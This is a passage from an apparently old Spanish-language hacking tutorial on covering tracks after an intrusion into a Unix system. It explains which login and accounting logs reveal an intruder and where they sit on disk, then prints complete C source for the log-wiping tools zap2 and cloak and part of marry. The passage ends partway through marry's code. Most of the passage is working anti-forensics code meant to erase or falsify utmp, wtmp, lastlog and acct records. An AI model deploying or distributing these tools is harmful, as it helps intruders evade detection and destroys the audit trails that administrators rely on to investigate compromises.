  9707.         Ademas de esto, se ha de tener en cuenta que muchas veces lo que
  9708.   hagamos en la maquina creara ficheros en el /tmp por lo que habra que darse
  9709.   una vuelta por alli antes de salir de la maquina y borrar si hemos generado
  9710.   algo... identificaremos rapidamente lo ke hemos generado nosotros por el
  9711.   propietario de los ficheros.
  9712.  
  9713.         En fin, todo lo explicado hasta ahora es suponiendo que no hemos
  9714.   conseguido root, pero si pillamos el root, casi siempre podremos borrar
  9715.   todas las huellas aunque tambien hemos de tener mas cuidado ya que si no
  9716.   las borramos bien y el verdadero root entra a la maquina y ve que alguien
  9717.   hizo modificaciones como root un dia que el no estuvo (y que estuvimos
  9718.   nosotros), se mosqueara bastante y le dara que pensar.... y posiblemente te
  9719.   pille o cambie las cuentas del sistema o haga cualquier cosa.
  9720.  
  9721.         La idea es que si entramos como login pepito, el root no puede saber
  9722.   si pepito es realmente pepito o no y no tiene manera de comprobarlo pero
  9723.   sin embargo el root si que sabe aproximadamente que dias se conecto por lo
  9724.   que si al hacer un last ve que se conecto por ejemplo el jueves 24 de enero
  9725.   y resulta que ese dia estaba con la novia...... pensando llegaria a la
  9726.   conclusion de que alguien entro a la maquina como root...... asi la
  9727.   conclusion es que cuando nos hagamos root hay que tener cuidado en borrar
  9728.   las huellas (este tipo de cosas puede parecer obvio pero siempre es bueno
  9729.   recordarlas no?). Tambien hay que tener en cuenta que si entras como user
  9730.   normal y ejecutas un xploit, en la mayoria de los casos tu uid no sera el
  9731.   de root pero tendras privilegios de root por lo que el root haciendo un
  9732.   last no detectara que ha entrado alguien kon privilegios de root.. aunke se
  9733.   puede dar kuenta por otros detalles.
  9734.  
  9735.         En fin, los logs mas importantes son:
  9736.  
  9737.         UTMP - Indica quien esta conectado en cada momento.
  9738.  
  9739.         WTMP - Indica todas las entradas y salidas de la maquina victima
  9740.   indicando el tty y el host.
  9741.  
  9742.         LASTLOG - Guarda un log indicando el momento exacto en el que se
  9743.   conecto el usuario por ultima vez.
  9744.  
  9745.         ACCT - Guarda todos los comandos ejecutados por los usuarios (aunque
  9746.   sin argumentos) y como os podreis imaginar eso se hace un log enorme en un
  9747.   rato por lo que no suele estar activo, pero siempre hay que tener en cuenta
  9748.   que puede estar activo y que es una putada porque logea todo lo que haces.
  9749.   En general, la mayoria de los zappers tienen opciones para borrar el acct asi
  9750.   ke no hay problemas. De todos modos, zhart (thc) hizo un programa ke sirve
  9751.   para borrar las huellas del acct ke esta bastante bien y ke lo puedes
  9752.   enkontrar en la red :)
  9753.  
  9754.         Y estan ubicadas en los siguientes directorios:
  9755.  
  9756.         UTMP : /etc o /var/adm o /usr/adm o /usr/var/adm o /var/log
  9757.  
  9758.         WTMP : /etc o /var/adm o /usr/adm o /usr/var/adm o /var/log
  9759.  
  9760.         LASTLOG :  /usr/var/adm o /usr/adm o /var/adm o /var/log
  9761.  
  9762.         ACCT :   /var/adm/acct ( en algunos sistemas se puede llamar pacct )
  9763.  
  9764.         Para borrar estas huellas, se puede usar el zap2 que lo adjunto ya que
  9765.   es muy usado aunque si lo usas has de saber que puede ser detectado
  9766.   facilmente con distintos programas ya que no borra tus huellas sino que las
  9767.   sustituye por ceros y ademas no borra el acct por lo que es mejor que uses
  9768.   el cloak que pondre a continuacion.
  9769.  
  9770.         En ambos codigos, tendras que poner la ubicacion exacta del utmp,
  9771.   wtmp, lastlog y en su caso acct que podras encontrar en uno de los
  9772.   directorios que he comentado anteriormente o simplemente los buscas con
  9773.   find / -name nombre.
  9774.  
  9775.         Bien, aqui va el zap2 cuyo uso es zap2 nombredeusuario :
  9776.  
  9777. ------------ Codigo Fuente ---------------------------------------------------
  9778.  
  9779. #include <sys/types.h>
  9780. #include <stdio.h>
  9781. #include <unistd.h>
  9782. #include <sys/file.h>
  9783. #include <fcntl.h>
  9784. #include <utmp.h>
  9785. #include <pwd.h>
  9786. #include <lastlog.h>
  9787. #define WTMP_NAME "/usr/adm/wtmp"
  9788. #define UTMP_NAME "/etc/utmp"
  9789. #define LASTLOG_NAME "/usr/adm/lastlog"
  9790.  
  9791. int f;
  9792.  
  9793. void kill_utmp(who)
  9794. char *who;
  9795. {
  9796.     struct utmp utmp_ent;
  9797.  
  9798.   if ((f=open(UTMP_NAME,O_RDWR))>=0) {
  9799.      while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
  9800.        if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  9801.                  bzero((char *)&utmp_ent,sizeof( utmp_ent ));
  9802.                  lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
  9803.                  write (f, &utmp_ent, sizeof (utmp_ent));
  9804.             }
  9805.      close(f);
  9806.   }
  9807. }
  9808.  
  9809. void kill_wtmp(who)
  9810. char *who;
  9811. {
  9812.     struct utmp utmp_ent;
  9813.     long pos;
  9814.  
  9815.     pos = 1L;
  9816.     if ((f=open(WTMP_NAME,O_RDWR))>=0) {
  9817.  
  9818.      while(pos != -1L) {
  9819.         lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
  9820.         if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
  9821.           pos = -1L;
  9822.         } else {
  9823.           if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
  9824.                bzero((char *)&utmp_ent,sizeof(struct utmp ));
  9825.                lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
  9826.                write (f, &utmp_ent, sizeof (utmp_ent));
  9827.                pos = -1L;
  9828.           } else pos += 1L;
  9829.         }
  9830.      }
  9831.      close(f);
  9832.   }
  9833. }
  9834.  
  9835. void kill_lastlog(who)
  9836. char *who;
  9837. {
  9838.     struct passwd *pwd;
  9839.     struct lastlog newll;
  9840.  
  9841.      if ((pwd=getpwnam(who))!=NULL) {
  9842.  
  9843.         if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
  9844.             lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
  9845.             bzero((char *)&newll,sizeof( newll ));
  9846.             write(f, (char *)&newll, sizeof( newll ));
  9847.             close(f);
  9848.         }
  9849.  
  9850.     } else printf("%s: ?\n",who);
  9851. }
  9852.  
  9853. main(argc,argv)
  9854. int argc;
  9855. char *argv[];
  9856. {
  9857.     if (argc==2) {
  9858.         kill_lastlog(argv[1]);
  9859.         kill_wtmp(argv[1]);
  9860.         kill_utmp(argv[1]);
  9861.         printf("Zap2!\n");
  9862.     } else
  9863.     printf("Now...that was as bad as shit!\n");
  9864. }
  9865.  
  9866. ------------ FIN -------------------------------------------------------------
  9867.  
  9868.         Bien, ya he puesto el zap2.. ahora pongo el cloak que es el que hay
  9869.    que usar ya que borra mejor las huellas y ademas se encarga del acct:
  9870.  
  9871. ------------ Codigo Fuente ---------------------------------------------------
  9872.  
  9873. /*
  9874.  *      C L O A K
  9875.  *
  9876.  *      Wrap yourself in a cloak of darkness (heh heh heh).
  9877.  *
  9878.  *      Michael S. Baldwin,  Matthew Diaz  1982
  9879.  *
  9880.  *      Marcus J. Ranum - 1983 - complete re-write and munging
  9881.  *      added more options, and all kinds of evil - including the
  9882.  *      ability to vanish from wtmp and acct as well as utmp. Added more
  9883.  *      error checking and useful command syntax. Now you can attribute
  9884.  *      all *YOUR* CPU usage to others when playing hack !!!
  9885.  *
  9886.  */
  9887.  
  9888.  
  9889. #include <stdio.h>
  9890. #include <sys/types.h>
  9891. #include <utmp.h>
  9892. #include <pwd.h>
  9893. #include <lastlog.h>
  9894. #include <sys/file.h>
  9895. #include <sys/acct.h>
  9896.  
  9897. /* set these guys. If you're sysV a port should be easy */
  9898. #define UTMP    "/etc/utmp"
  9899. #define WTMP    "/usr/adm/wtmp"
  9900. #define LAST    "/usr/adm/lastlog"
  9901. #define ACCT    "/usr/adm/acct"
  9902.  
  9903.  
  9904. main(ac,av)
  9905. int     ac;
  9906. char    *av[];
  9907. {
  9908.         char    *tp     = "";
  9909.         char    *un     = "";
  9910.         char    *hn     = "";
  9911.         char    *pn     = "";
  9912.         long    newt    = 0L;
  9913.         int     wflg    = 0;
  9914.         int     aflg    = 0;
  9915.         int     refs    = 1;
  9916.         int     x;              /* klunch */
  9917.         char    *p;
  9918.         extern  char    *index();
  9919.         extern  time_t  time();
  9920.  
  9921.         for(x = 1; x < ac; x++) {
  9922.                 if(av[x][0] == '-')
  9923.                         switch(av[x][1]) {
  9924.             case 'u':       /* username to be :-) */
  9925.                                         if((x + 1) < ac)
  9926.                                                 un = av[++x];
  9927.                                         break;
  9928.  
  9929.                                       case 't':    /* tty slot to be on :-) */
  9930.                                         if((x + 1) < ac)
  9931.                                                 tp = av[++x];
  9932.                                         break;
  9933.  
  9934.                                       case 'h':   /* host name to be on :-) */
  9935.                                         if((x + 1) < ac)
  9936.                                                 hn = av[++x];
  9937.                                         break;
  9938.  
  9939.                                       case 'r':   /* # of refs to zap :-) */
  9940.                                         if((x + 1) < ac)
  9941.                                                 refs = atoi(av[++x]);
  9942.                                         break;
  9943.  
  9944.                       case 's':
  9945.                                         execl("/bin/sh","sh",0);
  9946.                                         perror("exec");
  9947.                                         exit(1);
  9948.  
  9949.                                       case 'w':    /* vanish from wtmp, too */
  9950.                                         wflg++;
  9951.                                         break;
  9952.  
  9953.                                       case 'a':    /* vanish from acct, too */
  9954.                                         aflg++;
  9955.                                         break;
  9956.  
  9957.                                       case 'p':/* specific program for acct */
  9958.                                         if((x + 1) < ac)
  9959.                                                 pn = av[++x];
  9960.                                         break;
  9961.  
  9962.                       case 'l':       /* log on time */
  9963.                                         if((x + 1) >= ac)
  9964.                                                 break;
  9965.                                         newt = atoi(p = av[++x]);
  9966.                                         if(p = index(p,':'))  {
  9967.                                                 newt *= 60;
  9968.                                                 newt += ((newt > 0) ? 1 : -1)*
  9969. atoi(++p);
  9970.                           }
  9971.                                         newt *= 60;
  9972.                                         newt += time((long *)0L);
  9973.                                         break;
  9974.  
  9975.                       default:
  9976.                                         exit(usage());
  9977.                       }
  9978.  
  9979.           }
  9980.  
  9981.         if(wflg && wtmpzap(tp,un,hn,newt,refs))
  9982.                 perror(av[0]);
  9983.  
  9984.         if(aflg && acctzap(un,pn))
  9985.                 perror(av[0]);
  9986.  
  9987.         if(utmpzap(tp,un,hn,newt)) {
  9988.                 perror(av[0]);
  9989.                 exit(1);
  9990.           }
  9991.  
  9992.         if(lastzap(tp,un,hn,newt)) {
  9993.                 perror(av[0]);
  9994.                 exit(1);
  9995.           }
  9996.  
  9997.         exit(0);
  9998.       }
  9999.  
  10000. utmpzap(tt,un,hn,tim)
  10001. char    *tt;
  10002. char    *un;
  10003. char    *hn;
  10004. long    tim;
  10005. {
  10006.         int     fd;
  10007.         int     slot;
  10008.         struct  utmp    ubuf;
  10009.         extern  time_t  time();
  10010.         extern  char    *strncpy();
  10011.         extern  long    lseek();
  10012.  
  10013.         if((slot = ttyslot()) == 0) {
  10014.                 (void)fprintf(stderr,"No tty slot");
  10015.                 return(-1);
  10016.           }
  10017.  
  10018.         if((fd = open(UTMP,O_RDWR)) == -1 )
  10019.                 return(-1);
  10020.  
  10021.         if(lseek(fd,(long)(slot * sizeof(ubuf)),0) < 0) {
  10022.                 (void)close(fd);
  10023.                 return(-1);
  10024.           }
  10025.  
  10026.         if(read(fd,(char *)&ubuf,sizeof(ubuf)) != sizeof(ubuf)) {
  10027.                 (void)close(fd);
  10028.                 return(-1);
  10029.           }
  10030.  
  10031.         if(tim)
  10032.                 ubuf.ut_time = tim;
  10033.         else
  10034.                 ubuf.ut_time = time((long *)0L);
  10035.  
  10036.         (void)strncpy(ubuf.ut_name,un,sizeof(ubuf.ut_name));
  10037.  
  10038.         if(!tt[0] == '\0')
  10039.                 (void)strncpy(ubuf.ut_line,tt,sizeof(ubuf.ut_line));
  10040.                 (void)strncpy(ubuf.ut_host,hn,sizeof(ubuf.ut_host));
  10041.  
  10042.         if(lseek(fd,(long)(-sizeof(ubuf)), 1) < 0) {
  10043.                 (void)close(fd);
  10044.                 return(-1);
  10045.           }
  10046.  
  10047.         if(write(fd,(char *)&ubuf,sizeof(ubuf)) != sizeof(ubuf)) {
  10048.                 (void)close(fd);
  10049.                 return(-1);
  10050.           }
  10051.  
  10052.         return(close(fd));
  10053.       }
  10054.  
  10055. wtmpzap(tt,un,hn,tim,refs)
  10056. char    *tt;
  10057. char    *un;
  10058. char    *hn;
  10059. long    tim;
  10060. int     refs;
  10061. {
  10062.         int     fd;
  10063.         char    *p;
  10064.         char    tbuf[40];
  10065.         struct  utmp    ubuf;
  10066.         extern  char    *strncpy();
  10067.         extern  char    *strcpy();
  10068.         extern  char    *rindex();
  10069.         extern  char    *ttyname();
  10070.         extern  long    lseek();
  10071.         extern  time_t  time();
  10072.  
  10073.         if((p = ttyname(0)) != NULL)
  10074.                 (void)strcpy(tbuf,p);
  10075.         else
  10076.                 return(0);
  10077.  
  10078.         /* figure out our device name */
  10079.         p = rindex(tbuf,'/');
  10080.         if(p == NULL)
  10081.                 p = tbuf;
  10082.         else
  10083.                 p++;
  10084.  
  10085.  
  10086.         if((fd = open(WTMP,O_RDWR)) == -1 )
  10087.                 return(-1);
  10088.  
  10089.         if(lseek(fd,0L,2) < 0)
  10090.                 return(-1);
  10091.  
  10092.  
  10093.         /* this is gross, but I haven't a better idea how it can */
  10094.         /* be done - so who cares ? */
  10095.  
  10096.         while(refs) {
  10097.                 if((lseek(fd,(long)(-sizeof(ubuf)),1)) < 0) {
  10098.                         (void)close(fd);
  10099.                         return(0);
  10100.               }
  10101.  
  10102.                 if(read(fd,(char *)&ubuf,sizeof(ubuf)) != sizeof(ubuf)) {
  10103.                         (void)close(fd);
  10104.                         return(0);
  10105.               }
  10106.                 if(!strcmp(p,ubuf.ut_line)) {
  10107.                         if(tim)
  10108.                                 ubuf.ut_time = tim;
  10109.                         else
  10110.                                 ubuf.ut_time = time((long *)0L);
  10111.  
  10112.                         (void)strncpy(ubuf.ut_name,un,sizeof(ubuf.ut_name));
  10113.                         (void)strncpy(ubuf.ut_host,hn,sizeof(ubuf.ut_host));
  10114.  
  10115.                         if(!tt[0] == '\0')
  10116.  
  10117. (void)strncpy(ubuf.ut_line,tt,sizeof(ubuf.ut_line));
  10118.  
  10119.                         if(lseek(fd,(long)(-sizeof(ubuf)),1) < 0) {
  10120.                                 (void)close(fd);
  10121.                                 return(0);
  10122.                   }
  10123.  
  10124.                         if(write(fd,(char *)&ubuf,sizeof(ubuf)) !=
  10125. sizeof(ubuf)){
  10126.                                 (void)close(fd);
  10127.                                 return(0);
  10128.                   }
  10129.  
  10130.                         if(lseek(fd,(long)(-sizeof(ubuf)),1) < 0) {
  10131.                                 (void)close(fd);
  10132.                                 return(0);
  10133.                   }
  10134.  
  10135.                         refs--;
  10136.    }
  10137.  
  10138.                 if(lseek(fd,(long)(-sizeof(ubuf)),1) < 0) {
  10139.                         (void)close(fd);
  10140.                         return(0);
  10141.    }
  10142.  
  10143.    }
  10144.  
  10145.         return(close(fd));
  10146.    }
  10147.  
  10148. acctzap(un,pn)
  10149. char    *un;
  10150. char    *pn;
  10151. {
  10152.         int     fd;
  10153.         int     faku =0;
  10154.         int     realu;
  10155.         struct  acct    actbuf;
  10156.         struct  passwd  *pwt;
  10157.         extern  struct  passwd  *getpwnam();
  10158.  
  10159.         if((fd = open(ACCT,O_RDWR)) == -1 )
  10160.                 return(-1);
  10161.  
  10162.         realu = getuid();
  10163.  
  10164.         if(un[0] != '\0' && ((pwt = getpwnam(un)) != NULL))
  10165.                 faku = pwt->pw_uid;
  10166.  
  10167.         while(1) {
  10168.                 if(read(fd,(char *)&actbuf,sizeof(actbuf)) != sizeof(actbuf)){
  10169.                         (void)close(fd);
  10170.                         return(0);
  10171.               }
  10172.  
  10173.                 if(realu == actbuf.ac_uid) {
  10174.  
  10175.                         /* only zap a specific program to user */
  10176.                         if(pn[0] != '\0' && strcmp(pn,actbuf.ac_comm))
  10177.                                 continue;
  10178.  
  10179.                         actbuf.ac_uid = faku;
  10180.                         actbuf.ac_flag &= ~ASU;
  10181.                         if(lseek(fd,(long)(-sizeof(actbuf)),1) < 0) {
  10182.                                 (void)close(fd);
  10183.                                 return(0);
  10184.                   }
  10185.  
  10186.                         if(write(fd,(char *)&actbuf,sizeof(actbuf)) !=
  10187. sizeof(actbuf)){
  10188.                                 (void)close(fd);
  10189.                                 return(0);
  10190.                   }
  10191.               }
  10192.           }
  10193.       }
  10194.  
  10195. usage()
  10196. {
  10197. #ifdef USAGE
  10198.         (void)fprintf(stderr,"usage: cloak <options>\n");
  10199.         (void)fprintf(stderr,"options are:\t-l <+->hh:mm (login time)\n");
  10200.         (void)fprintf(stderr,"\t\t-u username\t\t\t-t ttyname\n");
  10201.         (void)fprintf(stderr,"\t\t-w (clobber wtmp)\t\t-r #of refs to
  10202. clobber\n");
  10203.         (void)fprintf(stderr,"\t\t-h host\t\t-a (clobber accounting)\n");
  10204.         (void)fprintf(stderr,"\t\t-p program (attribute only program to
  10205. acct)\n");
  10206.         (void)fprintf(stderr,"(no args causes a simple vanishing act)\n");
  10207. #endif
  10208.         return(1);
  10209.       }
  10210.  
  10211. lastzap(tt,un,hn,tim)
  10212. char    *tt;
  10213. char    *un;
  10214. char    *hn;
  10215. long    tim;
  10216. {
  10217.         int     fd;
  10218.         int     uid;
  10219.         struct  lastlog lbuf;
  10220.         extern  time_t  time();
  10221.         extern  char    *strncpy();
  10222.         extern  long    lseek();
  10223.  
  10224.         uid = getuid();
  10225.  
  10226.         if((fd = open(LAST,O_RDWR)) == -1 )
  10227.                 return(-1);
  10228.  
  10229.         if(lseek(fd,(long)(uid * sizeof(lbuf)),0) < 0) {
  10230.                 (void)close(fd);
  10231.                 return(-1);
  10232.           }
  10233.  
  10234.         if(read(fd,(char *)&lbuf,sizeof(lbuf)) != sizeof(lbuf)) {
  10235.                 (void)close(fd);
  10236.                 return(-1);
  10237.           }
  10238.  
  10239.         if(tim)
  10240.                 lbuf.ll_time = tim;
  10241.         else
  10242.                 lbuf.ll_time = time((long *)0L);
  10243.  
  10244.         if(!tt[0] == '\0')
  10245.                 (void)strncpy(lbuf.ll_line,tt,sizeof(lbuf.ll_line));
  10246.         (void)strncpy(lbuf.ll_host,hn,sizeof(lbuf.ll_host));
  10247.  
  10248.         if(lseek(fd,(long)(-sizeof(lbuf)), 1) < 0) {
  10249.                 (void)close(fd);
  10250.                 return(-1);
  10251.           }
  10252.  
  10253.         if(write(fd,(char *)&lbuf,sizeof(lbuf)) != sizeof(lbuf)) {
  10254.                 (void)close(fd);
  10255.                 return(-1);
  10256.           }
  10257.  
  10258.         return(close(fd));
  10259.       }
  10260. }
  10261.  
  10262. ------------ FIN -------------------------------------------------------------
  10263.  
  10264.         Ademas de estos, habria ke mencionar otros como el wipe, marry,
  10265.   remove, clean, etc... algunos de los kuales estan bastante bien. Adjunto
  10266.   tambien el marry ya ke ofrece algunas posibilidades interesantes y se usa
  10267.   bastante (borra tambien acct):
  10268.  
  10269. ------------ Codigo Fuente ---------------------------------------------------
  10270.  
  10271. /*marry v1.1 (c) 1991 -- Proff -- proff@suburbia.apana.org.au,
  10272.  *All rights reserved.
  10273.  *
  10274.  *May there be peace in the world, and objectivity amoung men.
  10275.  *
  10276.  *You may not use this program for unethical purposes. 
  10277.  *
  10278.  *You may not use this program in relation to your employment, or for monetary
  10279.  *gain without express permission from the author.
  10280.  *
  10281.  * usage:  
  10282.  * marry [-aetsuScDn] [-i src] [-o obj] [-d dump] [-p pat] [-v pat] [-m [WLA]]
  10283.  *         [-E editor] [-h program] [-b backup ]
  10284.  *
  10285.  *   -a     automode, dump, run editor over dump and re-assemble to object
  10286.  *   -e     edit source, assemble directly to input file, imples no insertion
  10287.  *          of records before an equal quantity of deltion
  10288.  *   -t     truncate object to last line of dump source when assembling
  10289.  *   -s     squeeze, delete all record in input not occuring in dump
  10290.  *          (higher entries in input will be appended unless -t is also 
  10291.  *          specified)
  10292.  *   -u     when in [L]astlog mode do user-id -> name lookups (time consuming)
  10293.  *   -S     Security, when in [A]cct and -[a]uto mode replace editor's acct
  10294.  *          record with an unmodified random previous entry, detach from 
  10295.  *          terminal, SIGKILL ourselves or execlp [-h program] to hide our
  10296.  *          acct record (marry should be exec'ed under these circumstances)
  10297.  *   -c     clean, delete backup and dump files once complete
  10298.  *   -D     Delete our self once complete (i.e argv[0])
  10299.  *   -n     no backups, don't make backups when in -e, -a modes or when
  10300.  *          -i file == -o file
  10301.  *   -i src input, the utmp, wtmp, lastlog or p/acct file concerned. defaults
  10302.  *          o the system wtmp/lastlog/pacct depending on mode if not specified
  10303.  *   -o obj output, the dump assembled and input merged version of the
  10304.  *          above. if given and not in -[a]uto mode, implies we are 
  10305.  *          assembling, not dumping. 
  10306.  *   -d dump  dump, the dump (editable representation of src) file name. this
  10307.  *            is is either an input (-o specified) an output (no -o) or both
  10308.  *            -[a]uto. defaults to "marry.dmp" in the current directory if not
  10309.  *            specified
  10310.  *   -p pat  pattern match. When disassembling (dumping), only extract records
  10311.  *           which match (checked against all string fields, and the uid if
  10312.  *           the pattern is a valid username)
  10313.  *   -v pat    inverse pattern match. like egrep -v. above non-logic features.
  10314.  *   -m mode   mode is one of:
  10315.  *
  10316.  *            W  -  utmp/wtmp (or utmpx/wtmpx see UTMPX #define)
  10317.  *                      L  -  lastlog
  10318.  *                      A  -  acct/pacct
  10319.  *  
  10320.  * -E editor  editor to be used in -[a]uto mode. defaults to /usr/bin/vi. must
  10321.  *            be the full path in -[S]ecurity mode (we do some clever
  10322.  *            symlinking)
  10323.  * -h program hide, if -S mode is on, then attempt to conceal our acct entry
  10324.  *            by execlp'ing the specified program. this seems to work on BSD
  10325.  *            derived systems. with others, your might want to just call marry
  10326.  *            something innocous.
  10327.  *   -b backup  name of backup file, defaults to "marry.bak"
  10328.  * 
  10329.  *   the following instruction codes can be placed in position one of the dump
  10330.  *   lines to be assembled (e.g "0057a" -> "=057a"):
  10331.  *
  10332.  *   '='    tag modification of entry. 
  10333.  *   '+'    tag insertion of entry
  10334.  *
  10335.  * Examples:
  10336.  *
  10337.  * $ marry -mW -i /etc/utmp -s -a  # dump, edit, re-assemble and strip deleted
  10338.  *                                 # entries from utmp
  10339.  *  
  10340.  * $ marry -mL -u -a -n -e        # dump lastlog with usernames, edit, make no
  10341.  *                                # backups and re-assemble in-situ directly to
  10342.  *                                # lastlog
  10343.  *
  10344.  * $ marry -mW -a -p mil -E emacs     # dump all wtmp entries matching "mil", 
  10345.  *                                      edit
  10346.  *                              # with emacs, re-assemble and re-write to wtmp
  10347.  *
  10348.  * $ exec marry -mA -SceD         # dump all acct entries by root, edit, 
  10349.  *                                        remove
  10350.  * -h /usr/sbin/in.fingerd       # editor's acct record, re-assemble directly
  10351.  * -p root -a -i /var/account/acct  # to acct in-situ, delete backup and dump
  10352.  *                                    file,
  10353.  *                               # delete ourself from the disk, unassign our
  10354.  *                               # controling terminal, and lastly overlay our
  10355.  *                               # self (and thus our to be acct record) with
  10356.  *                               # in.fingerd
  10357.  */
  10358.  
  10359. #define UTMP
  10360. #undef UTMPX /* solaris has both */
  10361. #define LASTLOG
  10362. #define PACCT
  10363.  
  10364. #include <stdio.h>
  10365. #include <unistd.h>
  10366. #include <stdlib.h>
  10367. #include <string.h>
  10368. #include <sys/types.h>
  10369. #include <sys/time.h>
  10370. #include <sys/stat.h>
  10371. #include <sys/wait.h>
  10372. #include <fcntl.h>
  10373. #include <signal.h>
  10374. #include <pwd.h>
  10375. #include <grp.h>
  10376. #include <errno.h>
  10377.  
  10378. #ifdef __SVR3
  10379. #  include <getopts.h>
  10380. #endif
  10381. #ifndef bsd
  10382. #  if defined(__NetBSD__) || defined(bsdi) || defined(BSDI) || 
  10383. defined(__386BSD__)
  10384. #    define bsd
  10385. #  endif
  10386. #endif
  10387.  
  10388. #if !defined(gcc)
  10389. #  define NO_VOID /* non gcc, early compiliers */
  10390. #endif
  10391.  
  10392. #ifndef __SVR3
  10393. extern char *optarg; 
  10394. #endif
  10395.  
  10396. #ifdef NO_VOID
  10397. #  define VOID int
  10398. #  define FVOID
  10399. #else 
  10400. #  define VOID void
  10401. #  define FVOID void
  10402. #endif
  10403.  
  10404. #ifndef bool 
  10405. #  define bool char
  10406. #endif
  10407.  
  10408. #define match(a,b) (match_s((a), (b), sizeof(a)))
  10409.  
  10410. #ifdef UTMP
  10411. #ifdef UTMPX
  10412. #  include <utmpx.h>
  10413. #  define S_UTMP utmpx
  10414. #  define UT_HOST ut_host
  10415. #  define UT_ID ut_id
  10416. #  define UT_TYPE ut_type
  10417. #  define UT_PID ut_pid
  10418. #  define UT_TV ut_tv
  10419. #  ifdef _PATH_WTMPX
  10420. #    define WTMP_FILE _PATH_WTMPX
  10421. #  else
  10422. #    ifdef WTMPX_FILE
  10423. #      define WTMP_FILE WTMPX_FILE
  10424. #    else
  10425. #      define WTMP_FILE "/usr/adm/wtmpx"
  10426. #    endif
  10427. #  endif
  10428. #else
  10429. #  include <utmp.h>
  10430. #  define S_UTMP utmp
  10431. #  ifndef WTMP_FILE
  10432. #    ifdef _PATH_WTMP
  10433. #      define WTMP_FILE _PATH_WTMP
  10434. #    else
  10435. #      define WTMP_FILE "/usr/adm/wtmp"
  10436. #    endif
  10437. #  endif
  10438. #  if !defined(ut_name) && !defined(ut_user)
  10439. #    define ut_user ut_name
  10440. #  endif
  10441. #  if defined(linux) || defined(bsd) || defined(sun)
  10442. #    define UT_HOST ut_host
  10443. #  endif
  10444. #  ifdef linux
  10445. #    define UT_ADDR ut_addr
  10446. #  endif
  10447. #  define UT_TIME ut_time
  10448. #  if defined(linux) || defined(solaris)
  10449. #    define UT_PID  ut_pid
  10450. #    define UT_ID   ut_id
  10451. #  endif
  10452. #  if defined(linux) || defined(solaris) || defined(sysv) || defined(SYSV) || 
  10453. defined(SVR4)
  10454. #    define UT_TYPE ut_type
  10455. #  endif
  10456. #endif
  10457. #endif
  10458.  
  10459. #ifdef LASTLOG
  10460. #  ifdef bsd
  10461. #    ifndef UTMP
  10462. #      include <utmp.h>
  10463. #    endif
  10464. #  else
  10465. #    include <lastlog.h>
  10466. #  endif
  10467. #  ifndef LASTLOG_FILE
  10468. #    ifdef _PATH_LASTLOG
  10469. #      define LASTLOG_FILE _PATH_LASTLOG
  10470. #    else
  10471. #      define LASTLOG_FILE "/usr/adm/lastlog"
  10472. #    endif
  10473. #  endif
  10474. #  define LL_HOST ll_host
  10475. #endif
  10476.  
  10477. #ifdef PACCT
  10478. #  include <sys/acct.h>
  10479. #  ifdef bsd
  10480. #    define PACCT_FILE "/var/account/acct"
  10481. #  else
  10482. #    define PACCT_FILE "/usr/adm/pacct"
  10483. #  endif
  10484. #endif
  10485.  
  10486. #ifdef UT_ADDR
  10487. #  include <arpa/inet.h>
  10488. #endif
  10489.  
  10490. FILE *ofh, *ifh, *afh;
  10491.  
  10492. #ifdef UTMP
  10493. struct S_UTMP s_utmp;
  10494. #endif
  10495. #ifdef LASTLOG
  10496. struct lastlog s_lastlog;
  10497. #endif
  10498. #ifdef PACCT
  10499. struct acct s_acct;
  10500. struct acct ac_saved;
  10501. int acct_step;
  10502. #endif
  10503. char ac_comm_hide[32];
  10504.  
  10505. struct passwd *uid;
  10506. struct passwd uid_s;
  10507. char **uida=NULL;
  10508. char **gida=NULL;
  10509.  
  10510. #define MAX_UID 65537
  10511.  
  10512. char *quotes="\"\"";
  10513.  
  10514. int globline=0;
  10515.  
  10516. char *a_Input=NULL;
  10517. char *a_Output=NULL;
  10518. char *a_Pattern=NULL;
  10519. char *a_Hide=NULL;
  10520. #ifdef sun
  10521. char *a_Editor="/usr/ucb/vi";
  10522. #else
  10523. char *a_Editor="/usr/bin/vi";
  10524. #endif
  10525. char *a_Dump="marry.dmp";
  10526. char *a_Backup="marry.bak";
  10527. bool f_Auto=0;
  10528. bool f_Squeeze=0;
  10529. bool f_EditSrc=0;
  10530. bool f_Truncate=0;
  10531. bool f_Exclude=0;
  10532. bool f_Uid=0;
  10533. bool f_Security=0;
  10534. bool f_Clean=0;
  10535. bool f_DeleteSelf=0;
  10536. bool f_NoBackups=0;
  10537. bool f_backedup;
  10538. char mode;
  10539.  
  10540. int mode_size=0;
  10541. void *mode_data;
  10542.  
  10543. int globline;
  10544. char *mes;
  10545. time_t otime=0;
  10546. FVOID display()
  10547. {
  10548. static int n;
  10549. time_t t;
  10550.     globline++;
  10551.     if (n++<30) return; /* don't want too many context switches */
  10552.     n=0;
  10553.     time(&t);
  10554.     if (t<(otime+1)) return;
  10555.     otime=t;
  10556.     printf("%s%d\r", mes, globline);
  10557.     fflush(stdout);
  10558. }
  10559. FVOID display_end()
  10560. {
  10561.     printf("%s%d\n", mes, globline);
  10562.     fflush(stdout);
  10563. }
  10564.  
  10565. #ifdef NO_VOID
  10566. char
  10567. #else
  10568. void
  10569. #endif
  10570. *
  10571. Smalloc(n)
  10572. int n;
  10573. {
  10574. #ifdef NO_VOID
  10575. char
  10576. #else
  10577. void
  10578. #endif
  10579. * p;
  10580.     while (!(p=malloc(n))) sleep(1);
  10581.     return p;
  10582. }
  10583.  
  10584. bool copyf(src, dst)
  10585. char *src;
  10586. char *dst;
  10587. {
  10588. #define CBUFLEN 128*1024
  10589. int fi, fo;
  10590. char *buf;
  10591. int cc;
  10592.     if ((fi=open(src, O_RDONLY, 0))<0)
  10593.     {
  10594.         perror(src);
  10595.         exit(1);
  10596.     }
  10597.     if ((fo=open(dst, O_WRONLY|O_CREAT|O_TRUNC, 0666))<0)
  10598.     {
  10599.         perror(dst);
  10600.         exit(1);
  10601.     }
  10602.     buf=Smalloc(CBUFLEN);
  10603.     while ((cc=read(fi, buf, CBUFLEN))>0)
  10604.         if (write(fo, buf, cc)!=cc)
  10605.         {
  10606.             perror(dst);
  10607.             exit(1);
  10608.         }
